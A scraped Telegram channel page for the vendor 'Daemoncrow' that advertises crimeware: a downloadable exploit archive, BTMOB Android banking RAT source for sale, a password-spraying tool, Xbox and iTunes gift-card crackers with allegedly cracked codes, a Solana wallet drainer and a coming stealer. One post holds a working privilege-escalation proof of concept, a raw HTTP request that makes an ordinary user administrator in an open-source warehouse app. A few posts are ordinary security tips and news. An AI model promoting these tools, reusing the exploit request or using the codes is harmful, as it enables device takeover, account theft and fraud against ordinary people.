es
Feedback
Daemoncrow

Daemoncrow

Ir al canal en Telegram

DAEMONCROW Premium Quality Services & Infrastructure Focused on reliability, performance, and long-term quality. Escrow Accepted via xss.ac Domain : mailer.daemoncrow.st Contact @daemoncrow @skibcum

Mostrar más
El país no está especificadoTecnologías y Aplicaciones45 725
677
Suscriptores
-124 horas
-27 días
+1830 días
Archivo de publicaciones
2025 EXPLOITS COLLECTION ⏩Sharing details on my 2025 exploits archive – organized by month for easy access. ⏩Each folder contains exploit files .txt and .py ⏩Good For Analysing Exploits ▶️Breakdown:
2501-exploits : 102 Exploits 2502-exploits : 80 Exploits 2503-exploits : 223 Exploits 2504-exploits : 167 Exploits 2505-exploits: 130 Exploits 2506-exploits : 126 Exploits 2507-exploits : 133 Exploits 2508-exploits : 120 Exploits 2509-exploits : 50 Exploits 2510-exploits : 74 Exploits 2511-exploits : 92 Exploits 2512-exploits : 267 Exploits
Download : Mega.nz TG Channel : Daemoncrow DM : Daemoncrow Private Contact : SIMPLEX Session ID : 05063b29826b7c9c6f5a516dbd45ebb5ee718324c1e6c9c7e1748dedea03945812

Vertical privilege escalation Vulnerability Discovered a vertical privilege escalation vulnerability in UserController.java o
+3
Vertical privilege escalation Vulnerability Discovered a vertical privilege escalation vulnerability in UserController.java of the project https://github.com/yeqifu/warehouse warehouse\src\main\java\com\yeqifu\sys\controller\UserController.java Ideally, only administrators can assign roles to users. However, this route did not perform identity verification when processing requests related to user-role relationships, resulting in vertical privilege escalation.An ordinary user can exploit this vulnerability to send a request packet, granting themselves system administrator privileges, thereby elevating their permissions and effectively transforming them into a system administrator. Poc
POST /user/saveUserRole HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/sys/toSignOut
Connection: close
Cookie: JSESSIONID=9551835BBDA3C718BDE26178E4DAA15C
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

uid=5&ids=1
Log in as an ordinary user.Attackers can specify their own account through the uidparameter, and specify the system role to be assigned through the idsparameter.Successfully executing this operation and set the current user to the system administrator role. TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX Session ID :
05063b29826b7c9c6f5a516dbd45ebb5ee718324c1e6c9c7e1748dedea03945812

BTMOB FULL SOURCE CODE RAT Features ⏩Support : Android 10 and Higher ⏩spreads via phishing sites ⏩WebSocket-based C&C ⏩BTMOB
+6
BTMOB FULL SOURCE CODE RAT Features ⏩Support : Android 10 and Higher ⏩spreads via phishing sites ⏩WebSocket-based C&C ⏩BTMOB RAT supports ▶️Live screen sharing ▶️Audio recording & microphone ▶️Real-time monitoring ▶️File management ▶️Audio recording ▶️web injections ▶️Banking ▶️Full Access to Device Stealth Features Based on Source Code Audit APK obfuscation – full Google Play Protect with active bypasses for Android 15 security. ⏩Anti-Detection - Runtime application self-protection (RASP) and checks the lock screen state to ensure it only operates when the user is inactive. ⏩C2 Communication - Uses WebSocket-based command-and-control for low-latency real-time command execution and monitoring
BTMOB Origin: SpySolr malware family
IMPORTANT ▪️We sell only source code ▪️We Dont sell any subscriptions ▪️We will provde complete 28 Minutes Setup Video For C2 Setup + Rat Setup ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖▶️ ПОЛНЫЙ ИСХОДНЫЙ КОД Возможности RAT ⏩Поддержка: Android 10 и выше ⏩Распространение через фишинговые сайты ⏩C&C на базе WebSocket ⏩BTMOB RAT поддерживает: ▶️Живую трансляцию экрана ▶️Запись звука и доступ к микрофону ▶️Мониторинг в реальном времени ▶️Управление файлами ▶️Аудиозапись ▶️Веб-инъекции ▶️Банковские функции ▶️Полный доступ к устройству Стелс-возможности на основе аудита исходного кода ⏩Обфускация APK — полный обход Google Play Protect с активными байпасами механизмов безопасности Android 15 ⏩ Антидетект — самозащита приложения во время выполнения (RASP), а также проверка состояния экрана блокировки, гарантирующая работу только в моменты неактивности пользователя ⏩Связь с C2 — использование WebSocket-канала управления для низкой задержки, выполнения команд и мониторинга в реальном времени
Происхождение BTMOB: семейство вредоносного ПО SpySolr
ВАЖНО ▪️Мы продаем только исходный код. ▪️Мы не продаем подписки. ▪️Мы предоставим полное 28-минутное видео с инструкциями по ▪️настройке C2 и RAT. DM For Price TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX Session ID :
05063b29826b7c9c6f5a516dbd45ebb5ee718324c1e6c9c7e1748dedea03945812

photo content
+8

Educational / образовательный 👍 🎮 Scammers are stealing Steam accounts through fakes on YouTube, TikTok, and Twitch. Here's how to avoid becoming a victim. Amid the Roblox blockage, scammers have intensified their attacks on gamers on Steam. Their goal is your game inventory (skins, items), which can be converted into real money, or access to your friends list for phishing. The scheme works like this:
▪️The bait: A video appears on YouTube, TikTok, or Twitch offering free skins for Rust, CS2, or access to "blocked games". ▪️The transition: In the description — a link that first leads to a fake site FakeTwitch or FakeSteam, which looks exactly like the real one. ▪️The theft: On the fake page, you're asked to log in via Steam. The entered login and password immediately end up in the hands of the criminals. ▪️A cunning trick: The links are one-time use. If you try to forward them to a friend or open them on another device to check, access will be blocked. This helps scammers stay unnoticed for a long time.
What to do? Gamer's digital hygiene rules:
Never enter your Steam login and password
outside the official client or website
steampowered.com.
Ignore offers of "free" skins on social networks and streams — it's
99.9% a scam
.
Enable two-factor
authentication
(Steam Guard)
. This will save you even if your password is leaked.
Check the domain of the site in the address bar.
🎮 Мошенники крадут аккаунты Steam через фейки в YouTube, TikTok и Twitch. Вот как не стать жертвой. На фоне блокировки Roblox мошенники активизировались против геймеров в Steam. Их цель — ваш игровой инвентарь (скины, предметы), который можно вывести в реальные деньги, или доступ к вашему списку друзей для фишинга. Схема работает так:
▪️
Приманка:
В YouTube, TikTok или на Twitch появляется видео с предложением бесплатных скинов для Rust, CS2 или доступа к «заблокированным играм».
▪️
Переход:
В описании — ссылка, которая ведёт сначала на фейковый сайт FakeTwitch или FakeSteam, выглядящий один в один как настоящий.
▪️
Кража:
На поддельной странице вас просят авторизоваться через Steam. Введённые логин и пароль сразу попадают к злоумышленникам.
▪️
Хитрый трюк:
Ссылки — одноразовые. Если вы попытаетесь переслать её другу или открыть на другом устройстве, чтобы проверить, — доступ закроется. Это помогает мошенникам долго оставаться незамеченными.
Что делать? Правила цифровой гигиены геймера:
Никогда не вводите логин и пароль Steam
вне официального клиента или сайта steampowered.com.
Игнорируйте предложения «бесплатных» скинов в соцсетях и на стримах — это
99,9% обман
.
Включите двухфакторную
аутентификацию
(Steam Guard)
. Это спасёт даже при утечке пароля.
Проверяйте домен сайта в адресной строке.
Официальный — всегда steampowered.com.
TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX

[SOURCE CODE - CUSTOM BUILT TOOLS] ✨Daemonspray is a controlled password spraying tool built for real Active Directory enviro
[SOURCE CODE - CUSTOM BUILT TOOLS] Daemonspray is a controlled password spraying tool built for real Active Directory environments. It focuses on accuracy and stealth rather than noise or brute force. WHAT IT DOES Pulls live users directly from LDAP, no static lists Supports custom LDAP filters to target specific users, groups, or OUs Generates passwords using patterns, not random wordlists Builds passwords from names, org terms, dates, and common human behavior HOW IT SPRAYS Uses Kerberos pre-authentication instead of noisy login attempts Respects domain lockout policies automatically Tracks per-user thresholds and skips risky accounts in real time Adds jitter and rate limits so traffic looks normal SAFETY BY DESIGN Reads domain password and lockout policies before starting Detects Password Settings Objects (PSOs) and adapts per user Prevents account lockouts by design, not by luck CONTROL & PERFORMANCE Multi-threaded with configurable limits Adjustable delays and requests per second SSL / LDAPS support for secure directory access Visibility & results Live feedback when credentials hit Automatic marking of compromised users as owned in Neo4j / BloodHound Clear attack summary with success rates and coverage DOWNLOAD : MEGA.NZ TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX

🎅🎅🎅🎅🎅🎅🎅🎅🎅🎅 Happy new year my brothers 💚 Another year another lesson Stay low stay human Warm homes calm minds We keep moving С новым годом 🫶🫶 Еще один год еще один урок Тише шаги чище мысли Теплый дом спокойная голова Идем дальше TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX

👥Hello everyone ▪️Today I want to share a real example of how we work with our buyers ▪️This screen recording is shared with full permission from the customer It shows the tool after customization ▪️exactly as the buyer requested ⚡️We do not just sell source codes We listen ▶️We understand the requirement ▶️We adjust the tool until the buyer is satisfied 👤Every buyer is treated with respect and care ✉️Support does not end after delivery 🚀If something needs to be changed we stay and fix it
This is how we work This is how we treat our buyers Thank you to everyone who trusts us
👥Всем привет ▪️Хочу поделиться небольшим примером нашей реальной работы ▪️Это видео с экрана выложено с согласия клиента ▪️На записи видно как инструмент был доработан именно под его задачу ⚡️Мы не гонимся за продажами Нам важно чтобы человек получил ▶️то что ему действительно нужно ▶️Поэтому мы всегда обсуждаем детали и доводим работу до нужного результата 👤Для нас клиент это не просто покупатель ✉️Мы остаемся на связи и после передачи проекта 🚀Если требуется помощь или изменения мы всегда помогаем
Такой у нас подход к работе Так мы относимся к людям которые нам доверяют Спасибо всем за поддержку
TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX

🍏 Xbox Gift Card Checker 🐍Source Code + Setups 💸 Gift Card Countries : USA ⚡️New Sophisticated GC Checker ( ITUNE GIFT CARD) Automated Key Generator + balance checks Fast + stable under load Valid Keys displayed instantly Requirements To Run the Setup ▪️Icloud Login/Pass Bulk Accounts ▪️Good Vps Stable Network ▪️Min 8Gb Ram / Prefer 16Gb or higher ▪️Python3.6+ ➡️Check Video For Complete Details
Cracked Codes XK85 WGZG JVRY ZPRY XPCX GYCY QJRL Y4XQ XDNQ WMCD 2ZP9 RVKH XCT4 H9YL 76MH 5YDH XZP6 VRPR JHRF YJNL X49P VD5C DJXV FX9R
Price Main Logic Encrypted Source Code Good for Customisations : $600 (upgradable) Complete Open Source Code With Api Engine: $1500 ✨Xbox Buyers Discount [50%] : source code : $700 XBOX CHECKER : DETAILS TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX

🔐 Encrypted DNS: your internet provider won’t see where you go Every time you enter a website address, your provider sees ex
🔐 Encrypted DNS: your internet provider won’t see where you go Every time you enter a website address, your provider sees exactly where you have been. They don’t know what you did there, but they see ALL the sites. It’s like someone writing down every address on the envelope — even if the letter is sealed. What’s important: ➡️ Regular DNS works like an open letter — providers, governments, hackers see all the sites ➡️ Encrypted DNS (DoH, DoT) encrypts requests — no one knows where you go ➡️ Enabled in two clicks on any device (Cloudflare 1.1.1.1, NextDNS, AdGuard) ➡️ Hackers can’t spoof sites or redirect you to fakes ➡️ Works everywhere — even on public WiFi where all traffic is visible Threatens everyone: On public internet, hackers catch DNS requests. They see you visited a bank site and create a fake one — you enter your password, they intercept it. With encrypted DNS, this trick won’t work. How to enable right now: iPhone/Mac: Settings → Wi-Fi → Select network → DNS → Cloudflare (1.1.1.1) Android: Settings → Network → Private DNS → one.one.one.one PC: Router → Change DNS to 1.1.1.1 💡 Tip in 30 seconds Change your DNS to Cloudflare (1.1.1.1) right now. It takes 2 minutes, and your provider will no longer see which sites you visit. Free, forever. Do it on all devices — phone, laptop, router. TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX

🤑 Cards, money, two bags: how hackers attack ATMs from the inside ATMs look like an impenetrable fortress: weighing half a ton, with sensors everywhere and a safe inside. But the problem is that they're mainly protected against sledgehammers, not against someone who knows how they're built. The PT Cyber Analytics team figured out what a modern ATM consists of and why logical attacks are becoming more dangerous than physical ones. 🔥 The main thing in 60 seconds
🔴 Trend: logical attacks are growing 8-10 times faster than physical ones. In 2020, in Europe, there was a +269% increase in cyber threats alone. 🔴 Money: the average damage from one logical attack has risen from thousands of euros to more than one million euros. 🔴 Insider: ATM VPNs are no longer exclusive. They're sold on trading platforms with instructions in Russian and subscription support. 🔴 Problem: in every second ATM, you can open the service door without an alarm - inside is a computer with Windows/Linux and standard software.
🔧 How an ATM is built (four attack levels)
1️⃣
User level
- card, NFC, QR, PIN on the encryption panel. Skimming is no longer relevant (thanks to Russian banks for their protection).
2️⃣
OS level
- a regular computer with Windows IoT or Linux, a kiosk application, UPS (control software), antivirus, AppLocker. The keys to the same series of doors are visible on the internet.
3️⃣
Network level
- connection to processing via VPN and standard protocols (NDC, DDC, ISO 8583). Monitoring servers are often unencrypted.
4️⃣
Firmware level
- the dispenser in the safe communicates with the OS via CEN/XFS, data is encrypted, and there's authentication.
Logical attacks are divided into: 🔴 System - hacking the OS, bypassing AppLocker, direct control of the dispenser via a black box (black box). 🔴 Network - intercepting traffic to processing, forging responses, remote control.

👋you might notice a linkedin post mentioning this Channel and Projects ✨nothing in it impacts the tools or the people here ✨
+1
👋you might notice a linkedin post mentioning this Channel and Projects nothing in it impacts the tools or the people here everything is running smoothly systems are stable monitoring looks good
this Channel is in safe hands on that side no action needed just keep doing what you do
all good on our end😊 ⚡️Soon will be launching our Private Daemoncrow Stealer V2.1 Admin : @daemoncrow

Backdoor code found in Trust Wallet browser extension, causing theft of tens of millions of dollars in assets A new backdoor
Backdoor code found in Trust Wallet browser extension, causing theft of tens of millions of dollars in assets A new backdoor code was added to version 2.68 of the Trust Wallet cryptocurrency wallet's browser extension, which sends users' mnemonic phrases to attacker servers. Due to the automatic update mechanism, the impact was widespread. On Christmas Day, December 25th, attackers began transferring funds, and according to current estimates, more than tens of millions of dollars in assets have been stolen. The latest version 2.69 has now removed the backdoor code.

Merry Christmas 🎅🔔🥰 To all My channel Subscribers I came Across Many Questions But this Question is alwys the best
User Question : If I may ask some crazy questions If you can really make this kind of profit a day why would you be here selling Who on earth tells or show when they earn or sell you something that can make you money
Fair question I'll answer it straight People who only Crack keep quiet People who build systems don't I'm not here selling profits - I'm selling tools, RATS, and access-things which i already use myself. - Cracking Codes | Rats,Malwares are finite. Selling infrastructure scales without touching my risk exposure - Also, showing results isn't to flex—it's to filter. - Anyone can talk. Very few can show consistent execution, Tool Developments , and systems running in real conditions. - If I wanted to stay hidden, I would. - I'm here because: I diversify income (Custom Tools ,RATS + products + services at 1977.ws) - I work with serious buyers, not gamblers 🔗You're not buying magic money. 📌You're buying time, tooling, and experience that took years (and losses) to build The Things work as designed TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX

[PROOF] LIVE CRACKED CARD + REEDEMED BY CHANNEL MEMBERS ➡️ DURATION : 9 Minutes (UNCUT) ➡️ We Are Addding Support for Apple ITUNE GIFT CARD Code Cracker In New Version (Cracker V3.1)Next Projects - Nike Gift Card Cracker - Razer Gift Card Cracker - Steam Gift Card Cracker How to Make Money With Gift Card Crackers : Here Past Freebies : Here TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX

congrats to luck guy

posting Live Video Please DM once anyone reedemed

FRESH NON USED XBOX CRACKED GIFT CODES Free Xbox USA 25$ Gift Card CODE
P4CJW-FGP6Q-4FXJJ-HHV2G-PRDMZ
TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX

📱 Xbox Gift Card Checker [1 Month Subscription] As Promised We Launching Xbox Checker Engine V2.1 💸 Gift Card Countries : USA/EU ⚡️No Source Code ⚡️Same Functionality and Same Cracking Power PRICING ⏩Only 1 Month Subscript Model : 180$ ⏩Source code with Engine : $800 CHECKSCheck Main Tool Fnctionality : here Check How to make Money with xbox checker : here ➡️Check Video For Complete Details Next Updates ➡️Usage analytics dashboard ➡️Distributed checking engine ➡️Custom validation rules ➡️Session isolation TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX

💰 SOLANA DRAINER [My Old Version Good For Learning Code] 🧩 Full Source Code FEATURES ➡️Custom Theme Landing UI ➡️Easy To In
💰 SOLANA DRAINER [My Old Version Good For Learning Code] 🧩 Full Source Code FEATURES ➡️Custom Theme Landing UI ➡️Easy To Install ➡️Telegram Notifications ➡️Clourflare Reverse Proxy Support ➡️Double Popup bypass ➡️"lol" Phantom bypass - One popup, with fake gain, but will drain all assets from user wallet. Without any warnings. Works on whitelisted domains. Download : Filebin.net PASSWORD :
Daemoncrow
TG Channel : Daemoncrow DM : Daemoncrow 😒Private Contact : SIMPLEX